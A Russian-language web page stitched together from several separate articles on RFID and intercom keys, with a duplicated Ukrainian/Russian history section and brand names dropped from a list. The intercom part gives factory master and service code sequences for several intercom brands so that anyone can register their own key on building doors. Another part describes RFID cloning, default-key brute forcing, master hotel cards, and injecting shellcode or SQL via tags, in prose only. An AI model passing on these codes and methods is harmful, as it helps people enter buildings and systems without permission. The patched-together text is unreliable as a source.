Какие бывают RFID системы контроля доступа. RFID-ключи: бесконтактные прокси-карты для домофонных устройств

02.05.2019 Android

Выход из строя ключа от — явление очень редкое, если рассматривать так называемые таблетки, и весьма вероятное, если речь идет о бесконтактной системе RFID, построенной на срабатывающих с большого расстояния картах.

Если по какой-то причине дверь подъезда, ворота частного дома или замок на работе перестали деблокироваться, часто возникает вопрос: как перепрограммировать ключ от домофона? Этот процесс для рядового пользователя совсем не означает сложного вмешательства и участия в программировании личного идентификационного устройства.

Особенности программирования домофонных ключей

Чтобы понять, почему программирование индивидуальных ключей домофона включает в себя только запись нового идентификатора и его привязки к абоненту на установленном в двери устройстве, стоит особо остановиться на механике работы и внутренней структуре привычных таблеток и карт.

Все ключи построены на схеме одноразового устройства. Если происходит сбой или физические нарушения внутренней структуры — личный идентификатор просто выбрасывается или уничтожается. Ни ремонту, ни перепрограммированию без использования специальных промышленных устройств — не предусмотрено.

RFID

Небольшие брелочки, карточки — уже знакомы множеству людей. Для срабатывания такого ключика, его не нужно прислонять к считывающей площадке. Достаточно только поднести на определенное расстояние.

По дальности срабатывания ключи ранжируются:

  1. с зоной идентификации в 100-150 мм, распространенный формат, тип Proximity;
  2. с дальностью определения до 1 м, тип Vicinity.

Не смотря на такие отличия в дальности, работа всех идентификаторов проходит по простой схеме.

Домофон, использующий ключи данного класса, имеет блок излучения электромагнитного поля слабой интенсивности в зоне контактной площадки. Внутри RFID карты или брелка расположена простая схема, она включает индуктивный колебательный контур, миниатюрную передающую антенну и чип, формирующий сигнал.

При внесении ключа в зону излучения — вырабатывается энергия, происходит активация внутренней электросхемы. Карта или брелок передают радиочастотный сигнал, домофон опознает идентификатор и разблокирует дверь, если он прописан в его памяти.

Простого способа, как перепрограммировать ключ от домофона класса RFID — просто не существует для большинства типов изделий. Идентификатор формируется напыленным в заводских условиях чипом, количество уникальных комбинаций (карт и брелков) — огромно, изменения в коде не предусматриваются.

Испортится ключ может как из-за механических перегибов, изломов (в результате происходит повреждение чипа или передающей сетки антенны), так и по причине воздействия сильного электромагнитного излучения, по силе сравнимого с микроволновой печью.

Touch-Memory

Touch-Memory - это знакомые большинству людей контактные таблетки. Внутри такого ключа также расположен микрочип.

Однако передача идентификатора происходит по электрической одноканальной схеме. В момент приложения ключа к контактной площадке, в домофоне происходи замыкание цепи считывания данных.

Уникальный код, прошитый в таблетке — передается и проверяется на соответствие одному из записанных в памяти устройства. Если опознавание прошло — дверь разблокируется.

Испортить Touch-Memory таблетку можно воздействием сильного статического напряжения, приложив таблетку к наэлектризованной одежде. Сделать это достаточно сложно, поскольку импульс должен пройти между определенными точками контактной площадки, однако такая причина поломок — самая распространенная.

Таблетка с чипом очень прочная, повредить ее механически сложно, ключ, кроме воздействия статики — можно сжечь в микроволновке. Любым другим воздействиям, включая мощнейшие ниодимовые магниты — Touch-Memory переносит без последствий.

Способ, как программировать ключи доступа для домофона данного класса, заключается в использовании специального программатора. С его помощью делают клоны таблеток, а также универсальные отмычки для серий домофонов.

Touch-Memory делятся на классы. Они зависят не от внутренней структуры и принципов работы, а от производителей, каждый из которых создает внутреннюю схему с определенными характеристиками и методикой формирования уникального кода.

Широко используются Touch-Memory следующих типов:

  • с маркировкой, начинающейся на DS (Dallas), применяются в огромном числе моделей Vizit, Eltis, С2000 и других;
  • с маркировкой DC, а также Цифрал КП-1 — данные Touch-Memory предназначены только для домофонов Cifral;
  • серии К, широко используемый в системах контроля доступа Metacom и других домофонах.

Аналогично существуют и классы, форматы RFID, к примеру, самый старый HID, популярный EM-Marin, а также используемый в срабатывающих с дальнего расстояния картах Mifare. Поэтому, прежде чем выяснять, как запрограммировать личный ключ от домофона от подъездной двери — сначала нужно приобрести Touch-Memory или RFID совместимого формата.

Программирование ключа от домофона своими руками

Методика, как закодировать персональный ключ от домофона от работы, дома или подъезда друзей — заключается только в записи данных соответствующего личного идентификатора в память контролирующего дверь устройства. Чтобы сделать это самостоятельно, необходимо получить доступ к сервисным функциям с клавиатуры передней панели.

Мастера, устанавливающие домофон — обязаны проводить перепрограммирование и менять заводские мастер коды и другую служебную информацию устройства.

Если это сделано, методики, как прописать свой ключ в домофон при помощи стандартных комбинаций доступа — не сработают. Однако огромное количество устройств на двери — откликаются на заводские коды и позволяют активировать сервисные функции.

Алгоритм действий

Самый простой способ — узнать, как закодировать ключ от домофона от подъездной двери, в обслуживающей компании. Некоторые из них предоставляют такие данные.

Но есть набор стандартных действий для домофонов распространенных марок.

  1. Rainmann, Raikman — нажимается вызов, вводится 987654, после звукового сигнала — 123456. Если появилось приглашение Р на дисплее — нажимается 2, прикладывается таблетка, нажимается #, <номер квартиры>, #. Запись в память производится кнопкой *;
  2. — набирается #-999, после звука-приглашения набирается код 1234 (у отдельных серий — 6767, 0000, 12345, 9999, 3535). После этого нажимается 3, после паузы — номер квартиры, прикладывается ключ, нажимается #,*. Если заводской код (1234 и другие) — не принят, домофон издаст двухтональный сигнал;
  3. , — держать кнопку вызов до реакции (звук, приглашение на дисплее), ввести 1234, затем номер квартиры, вызов. В ответ на приглашение прислонить ключ, выйти из меню нажатием кнопки *.

В самых современных версиях домофона Cifral используется достаточно сложные кодовые наборы. Методика, как закодировать ключ от домофона от подъездной двери, выглядит так: вызов, 41, вызов, 14102, 70543.

Затем следует дождаться появления на экране приглашения, нажать 5, ввести номер квартиры, после надписи на дисплее Touch — приложить ключ. О записи в память свидетельствует звуковой сигнал.

Заключение

Записать в память домофона можно любой из приобретенных ключей, которые по ошибке называют болванками. В реальности - это работающий механизм со своим уникальным кодом. Его требуется только зарегистрировать на подъездном устройстве.

Доступны разнообразные методики применения ключей. Один и тот же может использоваться на нескольких домофонах одной марки, при условии, что произведена регистрация на каждом. Главное, чтобы Touch-Memory таблетка или RFID карта, брелок — имели совместимы формат с устройством на двери.

Видео: Как сделать дубликат ключа от домофона

Пока в стране идут новогодние праздники и все отдыхают наконец соберу весь накопленный материал в одну кучку. Я давно не писал в блог, постараюсь исправиться в нынешнем году. Я не пишу о политике, философии, событиях моей жизни, только о железках. Увы о железах на работе я писать не могу в силу определенных причин, но копится материал научно-популярного и просветительского толка. Очень сложно написать лучше, чем уже написано в той же википедии.

RFID – R adio F requency ID entification – радиочастотная идентификация. На сегодня RFID метки это более широкое понятие и сюда приплетают в том числе и беспроводные сенсоры, хотя идентификация – не их основное занятие. RFID метка – это небольшое устройство, которое позволяет на расстоянии, в отсутствие прямой видимости считать сохраненные на нем данные, тем самым идентифицировать объект. Это как штрихкод, наклеенный на товар, только работающий по радио.

RFID метки бывают разных типов. По способу электропитания различают пассивные (полностью получают питание для работы от излучения считывателя) и активные (имеют на себе батарейку). Само собой у пассивных дальность действия ниже, зато срок службы ничем не ограничен. У активных все лучше, и дальность действия, и начинка поинтеллектуальнее, но батарейку нужно будет менять.

По радиочастотному диапазону различают LF (125 кГц), HF (13.56 МГц) и UHF (860-960 МГц).

Принцип действия

Считыватель и метка имеют катушки индуктивности, образующие колебательный контур. Когда считыватель создает переменное магнитное поле своей катушкой, магнитный поток проходя через катушку метки возбуждает в ней ток. Точно так же как работает к примеру беспроводная зарядка. Метка от возбужденного в катушке тока получает питание, и используя транзистор может на некоторое время (питаясь в это время от накопленного в конденсаторе заряда) замыкать катушку накоротко, тем самым меняя значение амплитуды тока в катушке считывателя. Считыватель фиксирует эти изменения, тем самым принимая сигнал от метки.

Устройства UHF диапазона работают аналогично, только вместо катушек – диполи:

(Иллюстрация из книги RFID Handbook by Klaus Finkenzeller 2 редакция)

Само собой это означает что весь обмен данными между меткой и считывателем происходит публично, и при решении задач определения подлинности нужно это учитывать.

Активные метки более разнообразны по устройству, некоторые вообще по сути являются радиомаяками, по несколько раз в секунду просто посылая в эфир свой номер (parsec). RFID метка помимо микроконтроллера, обеспечивающего передачу уникального номера может быть оснащена различными датчиками. Например датчиком давления. Такой датчик можно разместить в шину автомобиля и непрерывно контролировать давление воздуха в шине.

С каждым днем RFID меткам находят все больше применений. Начиная от использования в качестве ключей для домофона заканчивая противокражными метками в магазинах самообслуживания. Именно увеличение спроса, снижение стоимости из-за массового производства позволяет находить все новые и новые применения.

Метка передает считывателю в ответе на запрос свой уникальный номер. Более сложные метки имеют немного памяти на борту и могут хранить какую либо информацию, например количество оставшихся поездок, что избавляет от необходимости создания центрального сервера и поддержки его на связи всегда. Метка также может иметь на борту криптопроцессор и обеспечивать проверку подлинности или обмен секретными данными. Изучается вопрос добавления RFID меток к банкноты как дополнительная мера защиты.

В будущем возможно все продукты будут снабжены RFID метками на стадии производства, а холодильник RFID считывателем. Тогда взяв вечером спросонья из холодильника пакет молока он молвит человеческим голосом “Сдурел? Выкинь, оно во мне уже пол года лежит, испортилось давно”.

Примеры

Екарта – проездная карточка на все виды транспорта в г.Екатеринбурге. Представляет собой карточку Mifare. Внешний вид:

Немного ацетоновых ванн и видно катушку индуктивности по периметру. Система полностью децентрализованная и информация о количестве денег хранится на самой карте в зашифрованном виде.

Московский метрополитен. Конструкция попроще для удешевления, карточка одноразовая:

Брелок от домофона “Факториал”

Внутри тоже RFID чип от Texas Instruments

При этом при каждом открывании двери данные в ключе перезаписываются, таким образом невозможно увеличить количество ключей. Копия будет работать, но после первого открывания перестанет работать оригинал, так как данные в ключе меняются. Этим хитрым апгрейдом факториал разом сделал бизнес копирования домофонных ключей невозможным.

Активные метки parsec

Представляют собой герметичный контейнер с микроконтроллером, батарейкой и радиомодулем, который посылает в эфир пару раз в секунду свой уникальный номер. Закрепив такой на автомобиле можно определять какие авто на данный момент сейчас находятся к примеру в гараже. Основная задача этих меток в автоматическом открывании ворот и шлагбаумов.

При этом вариант на последнем фото снабжен еще и пассивной меткой, можно повесить как брелок для ключей, и открывать не только ворота но и двери.

Правда безопасность автомобиля, основанная на наличии такой метки уязвима .

Если разберем ключ от автомобиля то найдем в нем чип иммобилайзера, который по сути тоже RFID метка:

Справа на крышке. Надежность и секретность механических замков ограничивается точностью механической обработки и достигла своего предела. Электронные замки и ключи имеют значительно большее число комбинаций.

RFID метки могут внедряться на стадии производства, например гитар:

Производитель таким образом не только облегчает себе отслеживание продукции на складах, но и гарантирует себе способ отличить свою продукцию от подделок.

Вот шапка с RFID меткой пришитой при производстве:

Еще одна от куртки:

Немного растворителей и достаем метки:

Отдельного слова заслуживают так называемые противокражные метки, или 1-битные транспондеры. Это RFID метка которая передает всего 1 бит – информацию о своем наличии. Такие метки используются для защиты товара от краж. Я про одну такую. Чаще всего встречаются метки электромагнитной системы (метка – колебательный контур), и акустомагнитной. Метки других типов в наших краях встречаются редко.

Если вы параноик

Возможно вам пригодится RFID Zapper . Перманентно отключить метку можно также в микроволновке, просто включив на пару секунд. Пассивные метки считываются на расстоянии в несколько метров (для LF и HF вообще не более 20 см). Что бы считать метку на расстоянии 100 метров в считыватель придется закачивать неприлично большие мощности.

RFID (Radio Frequency IDentification) - технология автоматической идентификации, в котором посредством радиосигналов считываются и записываются данные. Данные хранятся в так называемой RFID - метке. RFID-система состоит из ридера и метки.

RFID-метки классифицируются по рабочей частоте, типу памяти и источнику питания. Ридеры бывают стационарные и мобильные.

Типы атак, применяемые в технологии RFID

Читая интересные статьи про RFID становится не по себе от примеров возможных атак. Ниже представлен небольшой список применяемых атак:

  • Dos-атака
  • RFID-Zapper
  • Клонирование
  • Атаки через RFID-метки
Dos-атака

Ученые из австралийского университета утверждают, что RFID первого поколения подвержены Dos-атаке. Суть в том, что чипы этого поколения используют диапазон 902-938 МГц, разделенный на каналы. Сканер может переключаться с одного канала на другой, а чип в силу своей пассивности не может сменить диапазон. Утверждается, что данный диапазон можно заглушить с расстояния в 1 м. с помощью несложного радиопередатчика. В связи с этим приводится достаточно абстрактное сравнение с Dos-атакой.

RFID-Zapper

Следующая атака - это простое уничтожение метки. Двое парней из рядов «Хаоса» пришли к выводу, что нахождение чипа в микроволновке на протяжении короткого времени является самым действенным способом уничтожения метки. В связи с этим был разработан девайс RFID-Zapper. В качестве основы использовали фотоаппарат-мыльницу. После некоторых апдейтов девайс научился создавать сильное электромагнитное поле, которое убивает пассивные метки.

Клонирование

Джонатан Вестхьюз (Jonathan Westhues) - студент, который создал устройство, позволяющее клонировать метки. Девайс назван proxmark. Он легко помещался в карман и при достаточно близком расстоянии можно незаметно клонировать метку.

Подмена содержимого памяти RFID-меток

На завершившейся хакерской конференции Defcon немецкий эксперт инфосека Лукас Грюнвальд (Lukas Grunwald) продемонстрировал, как содержимое электронного паспорта может быть легко перенесено на любую другую радиометку. При этом Лукас использовал разработанную вместе с его коллегой Борисом Вольфом (Boris Wolf) еще пару лет назад прогу RFDump, которая умеет считывать, редактировать, записывать (если это возможно) данные RFID-меток. Первой версией данной проги был простенький perl-скрипт, теперь же RFDump представляет собой удобную тулзу, распространяющуюся под лицензией GPL. Существуют пока только версии для Linux. Для работы программы необходим RFID-ридер ACG Multi-Tag Reader или ему подобный. Грюнвальд вносит в софт время от времени кое-какие поправки. Например, сейчас она позволяет задействовать в метке счетчик считываний (функция cookie), планируется введение возможности снятия шифрования данных меток с помощью брутфорса или атаки по словарю, а также проверка на ключи, выставляемые «по умолчанию».

После создания своей программы Лукас и Борис занялись активным изучением возможности взлома различных RFID-систем. Первым делом они изучили RFID-систему местного университетского кафе, где данные о сумме на счете клиента хранились прямо на карточке. Питание там стало для них бесплатным:). Дальше - больше: они останавливались в гостиницах и отелях, в которых для входа в номер использовались proximity-карты. Интересный факт: ни одна из десяти изученных ими RFID-система из не имела шифрования, и Грюнвальд после изучения 2-3 карт мог создать мастер-карту, открывающую любую дверь. Но и системы с шифрованием очень просто обойти: либо ключ подбирался простым перебором, либо стоял выставленный производителем по умолчанию. Уязвимыми оказались и системы супермаркетов, где начали применять RFID как альтернативу штрихкодам. Хакеры получили возможность с помощью карманных компьютеров поменять метки дорогостоящих товарах на менее дорогие, «спасая» таким образом свою наличность. По словам Грюнвальда, 3/4 всех изученных им RFID-систем оказались так или иначе уязвимы.

Атаки через RFID-метки

На самом деле через редактирование метки можно получить доступ к компьютеру и тем самым совершать различного рода атаки. Уязвимые места RFID-метки: SQL-Injection, web-интерфейсы, где не исключена возможность внедрения вредоносного кода, а также buffer overflow.

Допустим, в RFID-системе используются только метки с объемом памяти 128 байт. Программист, писавший приложение, обрабатывающее содержимое тэгов, поленился сделать проверку на длину этого самого содержимого. В итоге имеется возможность для переполнения буфера, ведь хитрый хакер может подсунуть системе метку с большим количеством памяти, чем 128 байт, внедрив туда и шелл-код.

Примеры реальных атак

Чтобы было ясно какие виды проблем могут возникать от RFID-хакинга рассмотрим сценарий реальной атаки.

- «Шутник» идет в супермаркет, в котором сканирует продукты в корзинах. Продукция магазина оснащена RFID-метками, а не штрих-кодами. Многие супермаркеты планируют ввести систему RFID, поскольку сканирование происходит гораздо быстрее. «Шутник» выбирает продукт, например, шоколадную пасту, сканирует и идет на кассу его оплачивать. Придя домой, он удаляет и уничтожает RFID-метку (уничтожить метку можно способами, описанными в пункте RFID-Zapper). Затем он берет пустые RFID-метки и пишет эксплойт на компьютере, который в последствии прикрепит к метке. Далее инфицированная метка прикрепляется к шоколадной пасте и относится в магазин. «Шутник» снова ее покупает, кассирша сканирует и в этот печальный момент заражается вся база данных супермаркета.

Игры нашего «шутника» продолжаются. У нашего героя есть кошка, у которой имеется подкожная ID-метка, которую «шутник» может перезаписать на какой-нибудь эксплойт с использованием коммерчески доступного оборудования. Далее, он идет к ветеринару с жалобой, что кошка постоянно просит еды. Ветеринар сканирует и происходит тоже самое, что и в предыдущем рассказе - заражается база данных и данное действие приводит к хаосу.

И самая страшная часть. Аэропорты тоже планируют ввести RFID-метки, которые будут крепиться к багажу. Это обусловлено тем, что RFID-метки возможно считывать на большом расстоянии, нежели штрих-коды багажа. Принцип действия тот же самый - приходит злой путешественник с инфицированной меткой, его сканируют. Только последствия гораздо опаснее - могут быть заражены сотни аэропортов по всему миру.

Многие компании на данный момент утверждают, что их ПО отображают данные виды атак.

Защита

Общие советы
- Многие компании при создании нового ПО публикуют код, чтобы сторонние программисты за вознаграждение помогли отыскать баги, допущенные разработчиками. Рекомендуется тоже самое делать и с ПО RFID.

Удалять ненужные функции.

Остановка атак на базу данных.

Для того, чтобы избежать атаки типа SQL - Injection следует выполнять тщательную проверку данных, передаваемых SQL - запросом. Так же существует понятие ORM - библиотек, которые являются посредником между базой и программой. Некоторые базы данных предоставляют возможности, которые ограничивают вероятность нападения. Например, как Oracle и MySQL позволяет только один запрос к исполнению в течение вызовов API, хотя новых версий MySQL позволяют программисту включить несколько запросов.

Клиентские сценарии можно предотвратить с помощью правильной обработки скриптов. Языки, используемые в web-разработке, обычно предоставляют функции, которые могут сделать это за вас. PHP может делать это автоматически для каждой строки, используя свои «магические кавычки». Если скриптовый язык не требуется, его отключение позволит избежать любой возможности его злоупотребления. SSI инъекцию можно также избежать использованием надлежащей обработки. Или отключить SSI.

Переполнение буфера (stack overflow) можно также избежать надлежащей проверкой границ буфера. Такие инструменты как Valgrind и Electric Fence
помогут осуществить проверку. Конечно использование языка программирования, который выполняет данные проверки, было бы гораздо лучше. Один из таких языков является Java.

Опубліковано 19.08.2014

Вы, наверное, замечали, что в некоторых магазинах на товары закрепляют “противоугонные” приборы. Это могут быть какие пластиковые блямбы или наклейки. Если такую штуковину не снять на кассе, и выйти за специальную рамку, расположенную на выходе из магазина, то зазвенит веселый звоночек и возле Вас мгновенно появляется кубический человек (или несколько). И начинается практическое познание что такое RFID . Но вернемся к теории.

Также у многих из Вас есть ключи от подъезда, похожие на брелок. Достаточно его поднести к замку и двери открываются. В некоторых городах существует система оплаты за проезд (например в метро), где используются бесконтактные RFID карты. Аналогичные карты используются в некоторых фирмах для контроля доступа. На некоторых товарах производители наклеивают свои RFID метки в виде наклеек, которые не сразу можно заметить. Такими метками замечают животных, а иногда – и непослушных людей.

Сначала немного теории, собранной из Интернета. Затем (в следующих статьях) – на примерах я расскажу, каким образом можно подключить различные считыватели к микроконтроллерам, микрокомпьютеров, и к обычным компьютерам.

RFID

RFID (англ. Radio Frequency IDentification, радиочастотная идентификация) – способ автоматической идентификации объектов, при котором с помощью радиосигналов считываются или записываются данные, хранящиеся в так называемых транспондерах, или RFID-метках . Любая RFID-система состоит из считывателя и транспондера (RFID-метка , или RFID-тег ).

Считыватели (ридеры)

Приборы, которые читают информацию с меток и записывают в них данные. Эти приборы могут быть постоянно включен в учетную систему, или работать автономно. Считыватели могут быть как стационарные, так и переносные. Исполнение считывателей также может быть различным: в виде рамок (как в супермаркетах), в виде настенных считывателей, настольных и портативных карманных. Считыватели могут иметь различные протоколы связи (UART , RS-232 , SPI , WG26 , WG32 , USB и т.п.) для подключения их к информационной системе.


Транспондеры, RFID-теги или RFID-метки

Транспондеры, RFID-теги или RFID-метки могут иметь различные исполнения и могут быть замаскированы под разные вещи. Также RFID-метки могут быть специализированны под конкретные задачи и иметь специальные крепления, например для маркировки животных или птиц.

Карточки:

Брелки:

Наклейки:

Для животных:

Для торговых сетей:

Большинство RFID-меток состоит из двух частей. Первая – интегральная схема для хранения и обработки информации, модуляции и демодуляции радиочастотного (RF) сигнала и некоторых других функций. Вторая – антенна для приема и передачи сигнала.

История RFID

Історія RFID починається з 1945 року, коли Лев Сергійович Термен зробив пасивний пристрій (тобто без будь-кого живлення), який модулював відбиту радіохвилю. Це був жучок, але його приписують до історії RFID за те, що цей пристрій “викривляв” наведену на нього радіохвилю. Саме таким чином і працюють сучасні RFID мітки.

Але були і активні системі. Тобто з автономним живленням. Вони нас не цікавлять. Я не буду розповідати про системи свій-чужий який ще під час другої світової почали використовувати у авіації. Це теж можна назвати RFID системами. Це можна при бажанні прочитати у Інтернеті. Нас цікавлять RFID системи масового застосування.

Отже перші RFID-чіпи з’явилися у 1973 році. З того часу з’явилося декілька типів міток і їх технологія постійно вдосконалюється.

История RFID начинается с 1945 года, когда Лев Сергеевич Термен сделал пассивное устройство (т.е. без любого питания), который модулировал отраженную радиоволну. Это был жучок, но его приписывают к истории RFID за то, что это устройство “искажал” приведенную на него радиоволну. Именно таким образом и работают современные RFID метки.

Но были и активные системы. То есть с автономным питанием. Они нас не интересуют. Я не буду рассказывать о системах свой-чужой который еще во время второй мировой стали использовать в авиации. Это тоже можно назвать RFID системами. Об этом можно при желании прочитать в Интернете. Нас интересуют RFID системы массового применения.

Итак первые RFID-чипы появились в 1973 году. С тех пор появилось несколько типов меток и их технология постоянно совершенствуется.

Классификация RFID-меток

RFID-мітки можна кваліфікувати за:

  • дальністю зчитування
  • джерелом живлення
  • типом пам’яті
  • робочій частоті
  • виконанням

RFID-метки можно квалифицировать по:

  • дальности считывания
  • источнику питания
  • типу памяти
  • рабочей частоте
  • исполнению

Дальность

По дальности считыватели RFID-системы можно разделить на:

  • ближнего действия (до 20 см);
  • средней дальности (від 20 см до 5 м);
  • большой дальности (от 5 м до 100 м)

Источник питания

По типу питания RFID-метки делятся на:

  • пассивные
  • активные
  • полупассивным

Пассивные

Пассивные RFID-метки не имеют встроенного источника питания. Электрический ток, индуцированный в антенне электромагнитным сигналом от считывателя, обеспечивает достаточную мощность для функционирования микрочипа и передачи обратного сигнала.

Пассивные метки УВЧ и СВЧ диапазонов (860-960 МГц и 2,4-2,5 ГГц) передают сигнал методом модуляции отраженного сигнала несущей частоты (англ. Backscattering Modulation – модуляция обратного рассеяния). Антенна считывателя излучает сигнал несущей частоты и принимает отраженный от метки модулированный сигнал.

Пассивные метки ВЧ диапазона передают сигнал методом модуляции загрузки сигнала несущей частоты (англ. Load Modulation – нагрузочная модуляция). Каждая метка имеет идентификационный номер. Пассивные метки могут содержать энергонезависимую EEPROM память.

Дальность действия меток 1-200 см (ВЧ-метки) и 1-10 метров (УВЧ и СВЧ-метки).

Активные

Активные RFID-метки имеют собственный источник питания и не зависят от энергии считывателя, благодаря чему они считываются с большего расстояния. Такие метки имеют большие размеры и могут быть оснащены дополнительной электроникой. Такие метки стоят достаточно много, а у батарей питания ограниченное время работы.

Активные метки в большинстве случаев более надежны и обеспечивают самую высокую точность считывания на максимальном расстоянии.

Активные метки, имея собственный источник питания, также могут генерировать выходной сигнал большего уровня, чем пассивные, позволяют использовать их в агрессивных для радиочастотного сигнала средах: в воде (включая людей и животных, которые в основном состоят из воды), металлах (корабельные контейнеры, автомобили).

Большинство активных меток позволяют передавать сигнал на расстояние в сотни метров при сроке жизни батареи питания до 10 лет.

Некоторые RFID-метки имеют встроенные сенсоры, например, для мониторинга температуры товаров, которые быстро портятся. Другие типы сенсоров в совокупности с активными метками могут использоваться для измерения влажности, регистрации толчков / вибрации, света, радиации, температуры и газов в атмосфере (например, этилен).

Активные метки обычно имеют значительно больший радиус считывания (до 300 м) объем памяти, чем пассивные, и способны хранить больший объем информации.

Полупассивные

Полупассивные RFID-метки , также называют полуактивными, очень похожи на пассивные метки, но оснащены источником питания, который обеспечивает чип энергопитанием. При этом дальность действия таких меток зависит только от чувствительности приемника считывателя и они могут функционировать на большем расстоянии и с лучшими характеристиками.

По типу памяти

По типу памяти RFID-метки делятся:

  • RO (англ. Read Only) – данные записываются только один раз, при изготовлении. Такие метки пригодны только для идентификации. Никакую новую информацию в них записать нельзя, поэтому их практически невозможно подделать.
  • WORM (англ. Write Once Read Many) – кроме уникального идентификатора такие метки содержат блок однократно записываемой памяти, которую в дальнейшем можно многократно читать.
  • RW (англ. Read and Write) – такие метки содержат идентификатор и блок памяти для чтения / записи информации. Данные в них могут быть перезаписаны многократно.

Рабочая частота

RFID-метка LF (125 кГц)

Пассивные системы этого диапазона имеют низкую цену , и по своим физическим характеристикам , могут использоваться также для подкожных меток при чипировании животных , людей и рыб . Но есть определенные проблемы с расстоянием считывания , связанные с длиной волны .

Метки диапазона HF (13,56 МГц)

Системы 13.56 МГц недорогие, не имеют экологических и лицензионных проблем, хорошо стандартизованы. Имеют достаточно широкую линейку решений. Используются в платежных системах, логистике, идентификации. Для частоты 13,56 МГц разработан стандарт ISO 14443 (вид A / B). В отличие от Mifare 1К в этом стандарте обеспечена система диверсификации ключей, позволяет создавать открытые системы. Используются стандартизированные алгоритмы шифрования.

Как и для диапазона LF , в системах, построенных в HF-диапазоне , существуют проблемы с считыванием на больших дистанциях, считывания в условиях высокой влажности, наличия металла вблизи.

Метки диапазона UHF (860-960 МГц)

Метки этого диапазона работают на дальних дистанциях. Ориентированы сначала для нужд складской и промышленной логистики, метки диапазона UHF не имели уникального идентификатора.

Предполагалось, что идентификатором для метки будет EPC-номер (Electronic Product Code) товара, который каждый производитель будет заносить в метку самостоятельно при производстве. Однако скоро стало ясно, что помимо функции носителя EPC-номера товара, хорошо бы положить на метку еще и функцию контроля подлинности. Возникло требование, которое противоречит само себе: одновременно обеспечить уникальность метки и позволить производителю записывать любой EPC-номер .

В 2008 году компания NXP выпустила два новых чипа, которые на сегодняшний день отвечают всем вышеперечисленным требованиям. Чипы SL3S1202 и SL3FCS1002 выполнены в стандарте EPC Gen 2.0 , но отличаются от своих предшественников тем, что поле памяти TID (Tag ID ), в которое при производстве обычно записывается код типа метки (и он в рамках одного артикула не отличается от метки до метки), разбито на две части. Первые 32 ​​бита отведены под код производителя метки и ее марку, а вторые 32 ​​бита – под уникальный номер самого чипа. Поле TID – неизменное, и, таким образом, каждая метка уникальна. Новые чипы имеют все преимущества меток стандарта Gen 2.0 . Каждый банк памяти может быть защищен от чтения или записи паролем, EPC-номер может быть записан производителем товара в момент маркировки.

В UHF RFID-системах по сравнению с LF и HF ниже стоимость меток, при этом выше стоимость другого оборудования.

Преимущества радиочастотной идентификации по сравнению с другими популярными системами

  • Возможность перезаписи. Данные RFID-метки могут перезаписываться и дополняться много раз;
  • Отсутствие необходимости в прямой видимости. RFID-считыватель не требует прямой видимости метки, чтобы считать ее данные. Ориентация метки и считывателя часто не играет роли. Метки могут читаться через упаковку, что делает возможным их скрытое размещение. Для считывания данных метке достаточно хотя бы ненадолго попасть в зону регистрации, перемещаясь, в том числе, и на достаточно большой скорости. В отличие от считывания штрих-кода, где всегда необходима прямая видимость штрих-кода для его считывания;
  • Большее расстояние чтения. RFID-метка может считываться на значительно большем расстоянии, чем штрих-код. В зависимости от модели метки и считывателя, радиус считывания может составлять до нескольких сотен метров. В то же время подобные расстояния не всегда нужны;
  • Возможность хранения большего количества данных. RFID-метка может хранить значительно больше информации, чем штрих-код;
  • Поддержка считывания нескольких меток. Промышленные считыватели могут одновременно считывать множество (более тысячи) RFID-меток в секунду, используя так называемые антиколлизионные функции. Устройство считывания штрих-кода может единовременно сканировать только один штрих-код;
  • Считывание данных метки при любом ее расположении. В целях обеспечения автоматического считывания штрихового кода, комитеты по стандартам (в том числе EAN International) разработали правила размещения штрих-меток на товарной и транспортной упаковке. К радиочастотных меток эти требования не относятся. Единственное условие – нахождение метки в зоне действия считывателя;
  • Устойчивость к воздействию окружающей среды. Существуют RFID-метки , обладающие повышенной прочностью и сопротивляемостью жестким условиям рабочей среды, а штрих-код легко повреждается (например, влагой или загрязнением). В тех областях применения, где один и тот же объект может использоваться неограниченное количество раз (например, при идентификации контейнеров или возвратной тары), радиочастотная метка оказывается более приемлемым средством идентификации, так как ее не нужно размещать на внешней стороне упаковки. Пассивные RFID-метки имеют практически неограниченный срок эксплуатации;
  • Интеллектуальная поведение. RFID-метка может использоваться для выполнения других задач, помимо функции носителя данных. Штрих-код не может быть самозапрограмованим и является лишь средством хранения данных;
  • Высокая степень безопасности. Уникальное неизменное число-идентификатор, присваиваемое метке при производстве, гарантирует высокую степень защиты меток от подделки. Также данные на метке могут быть зашифрованы. Радиочастотная метка обладает возможностью закрыть паролем операции записи и считывания данных, а также зашифровать их передачу. В одной метке можно одновременно хранить открытые и закрытые данные.

Недостатки радиочастотной идентификации

  • Работоспособность метки теряется при частичном механическом повреждении;
  • Стоимость системы выше стоимости системы учета, основанной на штрих-кодах;
  • Сложность самостоятельного изготовления. Штрих-код можно напечатать на любом принтере;
  • Чувствительность к помехам в виде электромагнитных полей;
  • Недоверие пользователей через возможность использования ее для сбора информации о людях;
  • Установленная техническая база для считывания штрих-кодов существенно превосходит по объему решения на основе RFID ;
  • Недостаточная открытость выработанными стандартами.

Как работает RFID система с пассивными тегами

Пассивные RFID-теги не имеют источника питания. Они используют энергию излучения антенны считывателя.

Считыватель излучает электромагнитное поле определенной частоты. Когда RFID-тег попадает в поле действия этого излучения, в антенне RFID-тега индуцируется электрический ток, мощности которого достаточно для работы чипа. Таким образом питаются пассивные RFID-теги .

RFID-тег с помощью своей электроники может вызвать больший отток энергии от антенны. Это искажает магнитное поле и вызывает падение напряжения на антенне считывателя. Этот эффект используется для передачи данных от RFID-метки .

RFID и права человека

Использование RFID-меток вызвало серьезную полемику, критику и даже бойкот товаров. Четыре основных проблемы этой технологии, связанные с неприкосновенностью частной жизни, следующие:

  • Покупатель может даже не знать о наличии RFID-метки . Или не может ее удалить;
  • Данные с метки могут быть считаны дистанционно без ведома владельца;
  • Если обозначенный предмет оплачивается кредитной картой, то возможно однозначно связать уникальный идентификатор метки с покупателем;
  • Система меток EPCGlobal создает или предусматривает создание уникальных серийных номеров для всех продуктов, несмотря на то, что это создает проблемы с неприкосновенностью частной жизни и совершенно не является необходимым для большинства приложений.

Главное беспокойство вызывает то, что иногда RFID-метки остаются в рабочем состоянии даже после того, как товар куплен и вынесен из магазина. И уже после этого они могут быть использованы для слежения и других неблаговидных целей, не связанных с инвентаризационной функцией меток. Считывание с небольших расстояний также может представлять опасность, если, например, считанная информация накапливается в базе данных, или грабитель использует карманный считыватель для оценки “богатства” проходя мимо потенциальной жертвы. Серийные номера на RFID-метках могут выдавать дополнительную информацию даже после отделения от товара. Например, метки в перепроданных или подаренных вещах могут быть использованы для установления круга общения человека.

